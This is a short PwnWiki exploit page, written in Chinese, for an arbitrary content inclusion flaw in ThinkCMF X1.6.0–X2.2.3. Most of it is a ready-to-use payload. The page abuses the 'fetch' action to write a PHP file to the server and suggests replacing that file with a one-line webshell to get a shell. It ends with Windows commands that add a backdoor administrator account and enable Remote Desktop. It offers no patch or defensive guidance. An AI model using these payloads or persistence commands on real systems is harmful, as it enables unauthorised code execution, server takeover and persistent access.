ThinkCMF X1.6.0-X2.2.3框架任意內容包含漏洞
From PwnWiki
ThinkCMF X1.6.0-X2.2.3框架任意內容包含漏洞
影響版本:
ThinkCMF X1.6.0
ThinkCMF X2.1.0
ThinkCMF X2.2.0
ThinkCMF X2.2.1
ThinkCMF X2.2.2
ThinkCMF X2.2.3
漏洞利用:
使用a參數的fetch方法,實現遠程代碼執行
?a=fetch&templateFile=public/index&prefix=&content=<php>file_put_contents('test.php','<?php phpinfo(); ?>')</php>
訪問:
http://127.0.0.1/cmfx/?a=fetch&templateFile=public/index&prefix=&content=<php>file_put_contents('test.php','<?php phpinfo(); ?>')</php>
訪問:
http://127.0.0.1/cmfx/test.php
即可顯示PHPINFO信息。
修改Payload爲一句話木馬即可Getshell。
新建用戶並添加到管理員組,開啟遠程桌面連接(對於Windows):
net user test test /add
net localgroup administrators test /add
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f